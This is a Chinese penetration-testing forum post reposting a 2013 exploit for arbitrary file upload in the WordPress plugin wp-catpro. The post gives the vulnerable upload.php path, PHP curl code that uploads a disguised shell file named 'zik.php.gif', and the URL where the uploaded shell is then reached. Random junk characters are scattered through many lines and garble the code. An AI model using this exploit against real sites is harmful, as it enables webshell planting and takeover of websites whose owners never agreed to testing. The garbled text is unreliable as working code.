中国网络渗透测试联盟

标题: WordPress插件wp-catpro任意文件上传 [打印本页]

---

作者: admin    时间: 2013-2-27 20:12
标题: WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
3 t0 N. i) s8 F- Z% d# m: {#-----------------------------------------------------------------------
! q" y9 N4 E  w9 g
作者  => Zikou-16
邮箱 => zikou16x@gmail.com
% q# d9 X% z* j& Y# B  V* E' E测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
! _% q$ G5 z9 v; w+ @1 Y. U: g/ ^####

#=> Exploit 信息:
------------------
! F# r$ o, T4 S& S8 _( a# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
" f. o9 H3 s/ h: y1 A8 g# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
$ E* ~! h& ~& o: V, d------------------
- K0 G$ ?; j- K6 _
#=> Exploit
-----------
<?php

$uploadfile="zik.php.gif";
5 z' ~3 a* @) T$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
1 L4 c- T6 i: z" S  V: H  ocurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
  Q; s4 P3 d- Z'folder'=>'/wp-content/uploads/catpro/'));
  N- U& c/ E2 I5 G2 icurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
- M/ i: @" {( }: ~, qcurl_close($ch);
- l9 M. f+ T! z* U, z
1 b$ H# a3 m, D! |print "$postResult";
$ }0 Q: z1 `) {2 l
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
2 z  P: h, B4 N/ K  j! P6 k, k  ?>
<?php
7 n# n% e" A! xphpinfo();
?>

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2